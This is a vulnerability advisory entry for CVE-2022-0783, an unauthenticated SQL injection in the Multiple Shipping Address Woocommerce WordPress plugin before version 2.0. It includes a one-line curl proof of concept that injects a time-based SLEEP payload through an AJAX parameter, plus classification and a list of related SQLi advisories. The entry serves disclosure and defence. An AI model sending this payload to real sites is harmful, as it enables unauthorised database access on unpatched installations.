Multiple Shipping Address Woocommerce < 2.0 – Unauthenticated SQLi | CVE 2022-0783

Description

The plugin does not properly sanitise and escape numerous parameters before using them in SQL statements via some AJAX actions available to unauthenticated users, leading to unauthenticated SQL injections

Proof of Concept

curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=ocwma_choice_address&sid=3+AND+(SELECT+1946+FROM+(SELECT(SLEEP(5)))zsme)'

Affects Plugins

multiple-shipping-address-woocommerce

Fixed in 2.0

References

CVE

CVE-2022-0783

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

CVSS

8.6 (high)

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com

Submitter twitter

cyllective

Verified

Yes

WPVDB ID

4d594424-8048-482d-b61c-45be1e97a8ba

Timeline

Publicly Published

2022-04-11 (about 2 years ago)

Added

2022-04-11 (about 2 years ago)

Last Updated

2022-04-13 (about 2 years ago)

Other

Published

Title

Published

2023-06-23

Title

MStore API < 4.0.2 - Unauthenticated SQL Injection

Published

2014-08-01

Title

oQey Gallery <= 0.4.8 - SQL Injection

Published

2014-08-01

Title

Booking System <= 1.2 - SQL Injection

Published

2021-03-08

Title

SuperStoreFinder & SuperInteractiveMaps - Unauthenticated SQL Injections

Published

2015-01-28

Title

Photo Gallery < 1.2.11 - Blind SQL Injection